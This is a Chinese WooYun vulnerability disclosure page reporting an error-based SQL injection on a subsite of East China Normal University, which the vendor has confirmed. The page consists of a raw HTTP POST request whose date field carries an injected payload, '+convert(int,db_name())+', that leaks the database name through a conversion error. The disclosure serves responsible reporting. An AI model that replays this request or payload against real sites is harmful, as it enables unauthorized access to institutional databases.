当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152373

漏洞标题:华东师范某站报错型sql注入一处

相关厂商:华东师范大学

漏洞作者: 路人甲

提交时间:2015-11-06 18:17

修复时间:2015-12-23 14:02

公开时间:2015-12-23 14:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-06: 细节已通知厂商并且等待厂商处理中
2015-11-08: 厂商已经确认,细节仅向厂商公开
2015-11-18: 细节向核心白帽子及相关领域专家公开
2015-11-28: 细节向普通白帽子公开
2015-12-08: 细节向实习白帽子公开
2015-12-23: 细节向公众公开

简要描述:

详细说明:

http://www.qinzhu.ecnu.edu.cn/

POST /WebForm/DownloadFile/ HTTP/1.1
Content-Length: 6372
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=lgbd3pf105qrwwcskpwmpelr; __AntiXsrfToken=4a12357944cf4600a06874353bbe5321; __RequestVerificationToken=JuKD-0s6X8X2VbIotD9FgLc0cTCrAh8A1s557WA4pD4oT-nEikMFPbHTFC5SQdBehFNNq8iZsdcIL0TZuL1hekVLFegPBr8wqOXhqbW5TvQ1
Host: www.qinzhu.ecnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ctl00%24ContentPlaceHolder1%24FilterButton=%e7%ad%9b%e9%80%89&ctl00%24ContentPlaceHolder1%24DateTimeCreatedTextBox='%2bconvert(int,db_name())%2b'&ctl00%24ContentPlaceHolder1%24TitleTextBox=Mr.&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=Phfco6ibajJfOgk9juoB0unt1GeNtU4RuPK8L4wEcer/niRYnS0IyfoHb6A%2b2mH4uBYYq47DrBhtD4SbYfGfVaD59y8Cjbm4Vn0o3lc80nLjDwEwiDD0/045/kTbJeNqXsXtH3tWq5odHgzN%2bBh2JukBfbn/sVTSJXryhy9nNZMDCKwpjoRgYWSwV/%2bYoWu6%2bHlJQuP9HiqUEWyx//VxiQ%3d%3d&__VIEWSTATE=DZ8ZX3n5bmlA%2beuR7Eky2SlayxA40TLNbxOYQxcCjFzvPtsFmTRxzD8LGYhrlyoJ7OceSMAotdf8gyMLP9fSiGJGpvs8zOHd%2bvIpip29Akzw02cjq8Cxt5qBQqcDQLoci8%2b/fwe/9HR0/lQr3Txw6AmF5OuOhoeFivoGGfSuQP9zQSGKrSMIYHT801S/liD5QOVfuiXpHiLKOvTH9w4RXjwhPssXfE%2bDQaH5oTEqO7bCNYRdRpNYNDR7J0AA5XXhIga2bdNjDG2StmdJJyq2DUEl55xBL8CKEF5sEfyiEoLxjwyoYy4kATUD%2b/AtJBIe76D%2bPfEKDAoGqkOxdmlrI1uYQx3AK%2bo9wSSDjh4DFcqb0UN5%2beccG9yJVODvtxTiIGX96Fs6IC/PWNvRXvIuNuLmUkt1kAdi1dKgDOB/WSAhtAJa3ZOSgXjBaK%2bvalKWDklmAK%2bbQJe8R/2dLq5hlzfi6SbRxajA/%2bE3Pf26zslrV1GjzkwC%2bhuzEgxjlNWPPrsQEpUJ0VEOGwrUSUSDVY3X08lOh6e%2bry57s9FPBuleA%2bB8iDYZR/TTmJdHNAvDK7RHQ5qyC2osOqD42ZddKzzrrDc3QAFzC6ErkmLqCVvwHNEbXebpjwGD%2b9QfF07JcP4gVqIxiAK/vQW/6AXPMLDMSl5k5bbAAoHjwJYjpCExk4kR2UGHihmGQnFJKeDXV5OQMFFkw%2bQL7qItmZTx%2bWiBIOEJfUUucG%2bmqF/Hwl1bAEDJ5eLO6xZKAKfw/RG9dTzbiYPhOiIUEfsIYgso9M06Ngt98jTuVHGE1X26gJbaFCE6IRtGK/MNPvOdH1HAfcvgyi2hOGOBJo%2bDmEv7qwqNwJe9Bg5R/VPYBmtr4ay91%2bcE/GyLIrtNOvvnFiNHnNvA4f1m8iKH08TZV9DZxULXwh6bh6T8Ah9g8uJbTunN9Gw7yvdsMbTCb5RgO0Dmtf1XRuUuxTat3Z%2bXb7QD8HJuHswf3Nb3L3MNQBjxilGzjOSt0zSFAzxvcsEaIM7qHmlkui1vZ5DwbSQPcDyPjbolxT%2bmpXvCzFX8MEvw88qo2fE9oGVUjy/ju%2bXWWTPH8qBGGH3cDfxBcnIveWHEC/6I5eUPxXb7uQsX0nUBdmxRh9%2bFZrAmPHvaceWyG6dJ0Zf04VyAgaPmklnkdfXBVFrE65%2bQnwBq%2bChBvMtKDzS2dbtrZHjQmtlehS3ISqZZSTsmB9hgkTepLgg8JyJpggYyEicufyJqUSnVjIwSZ5WNFRuMBOyGS/t/5rc4tqNXRvXzZ122saSdFK2Ca%2bJMp0UOrmwY2EvU6aaUKKY%2bvsEBoDUnR0pdeIGzebk2hdRt2bVh72pqBXtsrrHogZpBWgi4o0gVmbswC4itr/Aahc/cZjcCVbJhNVdn5GzZaGfKVnK%2bDm8O/s%2bnlq5oZ%2bFMhL4kFKprBT0GI1%2bd2VG2u1Zgk2c0z3fPnql7kdpUAs8KtKHtZriHpGO2FvoxlW8rZIApYw0x1K/od7P1LXpHV20U9gIVMkutjtkWYaWxLzZyAZ6YAivBlMfBIGLAke6xQV7Fm73zy8prwpOqBR6T4FP%2bxr2EWFgTC309JHCm1oPABLW6a4RmQ%2bJn1Bh/eYQE7RDLaRGnBJEHHB5PPDBSgOZrQQVro6DxAV9qj%2bc6w8/umPAHUN2dMqOJzhkha4/UTdowgdu/5wN%2bu1d2d7cj%2bVRrM70NHNHe4KbH7UdWfyZirnqdBDIr5SiAGpiY4NQCCjQi7yUyEi1Ty/fTSATRJetSmnP8TF7wz%2bSwdRno/HQ69ClVWxJY1R3ZxZ/NeVqUt4BNaf%2btsP4tJKJ4VNsoxJUrsKr5510lJs20XqtOFGsRe85JfV%2bV9cAVz4wJIhGnorcjDmM%2bq8AoLJU3mZpNJo8ddpIscZBvTToY2fa5wfTirc3cSDxTRlKxx0hy3Zz1NEtLayDkPNS2r%2bs9C6ByBzS1fgmlJZVkwDgp/k9qOriC8maxST9zVQprRklcv071ytW0oR5Tvib6BRWeNNNHZsB76M5PZIl5VUufA5nQS4Bv07PFdr3r1wTYXFjAWmpoXcV1I05x90SyiTKO5kkOlmO7Tx179WmREH6QcxCvOHJZqtwAIsp0u%2bRIy18KG2PqQLZ8Hr4ailGCyBwk9iA07TG6sXEbMUN17k095zYQO87zpmweUwk6vz9cJdaizuVwSN1Zxu5CkvAaU4evbGdnr7h8HQ%2bnvjfUBEb01Vh1vOPRt9jnOlfGFThG4M5w1YFcsMobw4Gw55dSt3gWHQjdzvu8i730bn%2bs0gHW5j5jcyV3uJAueiLMUCHBLlNIC3J4qA5zbQDSom4rgpZL84xGKXt/F4F41CAQa4QKbz42TiorepScH4tQwmtvkjCN1O3GMC8qe7g0pSi0wila1hM2fFzJJeVHxOzQq7kCrvjNa/WTLV7J3uDY6RO2UEX59OuLR5ZeEmrJ/AXUQ6/4zSbWTLCn3rAIUPrqz76dnTnbTr1u6eUcUAjEy9yOEYL05Sz01yV%2bi7BXitML%2b4EYCbQCdDHXnosAI6rWJK7Zfd6OiL7yHvGVYxbPQYSexQEg3cxJJt0iO/cEtlOHRKijePcW5crLhLxRkvtpPYuuEKtiyafKjIQHXMsTOwCeMT5O4d70uxu62wWOr0%2bPtzbXmCpltZa5jcBvpIWFr6Q0Eh20ZJ1OcHE/COaHcU3fUlAd1%2bnEBfNrW/VULFRegaOka4zUmZCdupdZcQ9FNDewxqfh0GglALx01BH2kpxDDRnRLlgGNp/ZbfhRsSHh4%2bG7JpnyDU18t13F8HO/E2e08MeLhTrcwj4qIZKtfz%2bDgjQ4fcVKETDefG4OMTPXyOzoC1QZzCrt1nMS38spbbOLVnIKqWWnTdfnxHUxIC1HDOaAnMPYAc4lyLqRYNiKhrKIfmJCfANj532PXSvQAqePLvVLHGP7vknQsMpP/O3GIC4clcZoZSyeMYYRtVoS15F1RXTmC0ePtu4K3plfmnRRSr7zt3WozZJ4TL/O0p9vlg8NE0LPxx4cgGNZq41dGjUG4X33s2zm/aWbU7aa6aGEbPxZihnzuYp3NrZeWlwQszgRm3t%2bFIEJbuX6CLV4aF%2bRdojjri2rqfIfMkeKlzWrfYfMBfg98g4ZfWAV%2b7j09x%2brYZDd4fXqtsxGiPEQS%2blk5ifjebm1JdZluNkl3mnLW7rJJ7WtwvKI1VnZ94W8ZtXmWe49DIx6zbEY5s1jUys07CggryzzA4YMLiGCzJr3ItPcCPsl1fJSPqPqaJuRk9rjc3khdbaS2LR1KiI%2b8VKH7HH9TMuBHxdwduK4wvQm5ZRbaR5vUTN5TfpRUFlv0Kmi12i1NJFnzSVOuGNzMPzeLmIJ3DixZnOFq3xA54dFG%2bj%2b0x3XLjGxY9LCysc7CDLhayGS//1iQ6OjPy2xbo/uGrPbbeQVAyVfsbXjRaxPN4NKyXm5spm5WiPXrDbBVcyEM6Vms8V/9FhV65aWiB3sJvLw0EFVEVOYp6pfC4Zg6m7R3VaB6Uf2NXh6H6Y8iTZ9A39bPDF59MKV6FY3nbJk9TJAZqlKBBHM/SkLK5Tk%2bvPBbMZwnnoeEis1tA07wp1wb1iYDbGvNTlfMmYM/cYQJ79ZMdinwbmG%2bnnm4T1aICeX7mtTRRguILQnh8rhzISC/Q%2bdpDPt1ht9jzvSWzh6Jxe7u6u5DH95PQW9RPaEb0G8H%2b1sPzUOfPRF6tL/v0PFQra3IkBWodVqZjNkb02Ur%2bC9VXFBSeugzvtV40nk2DccoLBNCK3pZB6VU5uladSSoGvmkyzJcRe8W5M%2b0LEbph6hLWhfhsBcQD4yWZcRB73gCIyrPISz6QdwO1n4dA8vYDb5feTAct3BVFvVAuesDnlJXfAH7/MO84idZAfOJ74W5AdGBBRLsPl8RXTRF6UCsPENXGqFtn2IOHK7ZyC9IeMFkviX5Yg/m%2b10ZbN2h3nEUOClmpGKbZmLgZuSrUrPIPua1YOlFVKDJe3W/QXUJoJAu/lLL4kssYGP8MfUcxRAgURwI2ReW6Di4MJ4vbMbaud4HyyzliJwq1jduaArrWd8ZbzlD4mPpX5hw3nJslWSY8oiWuytJYXtbSYI2cvY00OEg0k7ofqfWVzotXKJfHeDXwk84lgYkaofh2TF75hg9jBKu/lfgvR7FioaAeydvQWPbKFJUGUvAZo78k9fDVQbu22A3uYR5jZtxjlQO%2byLkXrrjBQ/Pfmm4CewjF/paBSPvXaZIfr6%2bzO/QwIV3PWvfrGqU9XzowYu/5xtkE4Qgl1q53bR17UyzjLYSQihaJBZ6/PdgNApFQc/vLuGBM5Br%2bmlFMEy8ORbjbusWwbWCs1OOetg9QzvUuZpbDEcgMjR6I6hN1UPQfY%2bPU/mXzVNDyMF/pOrB3gwZqQcB46Jjryl1fy2YCqI%2bjl87eteShxFNPH8Uh78NDR/fEPQQJO8gEvNE1vvUskgih/rapgqzKyOToy/6geoylXSMn8nJGlivggc0pziw97qokIo1DbXA5VOYATxEopc1au%2bXncDrE7sYZOGkJGfbWSHob5sIbIaM5WwK0kDkvBf0YFOW0QLjfObFa4Ryo50hcsQGo5RbRYgj3EBxg2dv7uSW0rrRLwrJPIN86RIpu41Zz2GCo1wu9ej21thejV%2bicwkD7lBuzvZ185rUsabgjR15ZaPzhwy%2bQ1vNcak9NyyxAjcK5b8zv13TyAY67aX0dFeMRzb6aSI0yb98yE7IPTgOJDd36FbVviaw2JIEpTi9l/4jG%2bWkAxx0SGGHU40IHlSRdC7blOkXXG4QjgyNP%2biYlo1umMbuS0pWYyd6Lp0sIuNo/oUHROHbS%2bXw/aw4igdck/HYjFH2IuNVcdO5J5B9FmsbL8zpwMcIyiX0qpQFdorOpfkXwHywhqBYAtXAVukq1wlLQbe%2bJLOohRkK68KMm6aKO2lEGg/jt4rMR%2bJAVE9flt/pKL0jb%2bQ8nu2ml0RSKEmJQwQHGydu0F7nVR9qG1B/fLRrY1XNQsdb84BiAstN8b25j0S4XfVFwkZNJYHDdwhGbh8ZvlaeXtvLEIJWfFJIr7U9e9k1n33D5qZ7LPpcFAmNuAzg2nCvg1Chh75PiIIedNUNV4LaB%2bLB52Ls6q4rpijkc3kJEs01KBa8cS6kKYRsr03SC0lJ66M4RQMVTvqBjZ7A7hkI2%2bC3nBX5vk73C//AZoUvRplhWqoovO7B0jIjSAeGIx7g3W7GRAS4kIXMJkh4Lp6K3GR%2b%2bln3lpDa3hoU8S%2bY9yJ3JPlkm2o7nAuunEscpXCDi/VytOuY7T4UVa4oUBkboA2j6lJ9cOJoo5xHILDhcgA5EEg2Q3v4ASlL/r7rwWFnd5QfwoHfN3n2BCQjU4XlZ1NvPCW5%2bSobPjmtdj5eHwa%2beJwNUc9kuZmIAf2lghQ/btLnYOf6TD2mAMbps9VXCikJu9yeprDO7sFnKrLivj9KK/Y8XsiG1ibRomSmXefKM31gSBR27%2bdX8RXM97teldbNcYM2uIyBYAvtyqliWc55Ayj%2b3XKoZ7fvqo3HBUhdumNPhppStWtarvzs6GCO5UdMhEOmvOTsnq9amycEzzGhgVkhQQ6iHGNCcr7i2XoIEtj3Lec2CJM/p6DZOfXpR5%2bB6FRMh3maXN8OamniTlC92DtkfVmKLcyBv0%3d&__VIEWSTATEGENERATOR=8ED40EAB

11.png

22.png

33.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-08 14:01

厂商回复:

通知二级单位处理。

最新状态:

暂无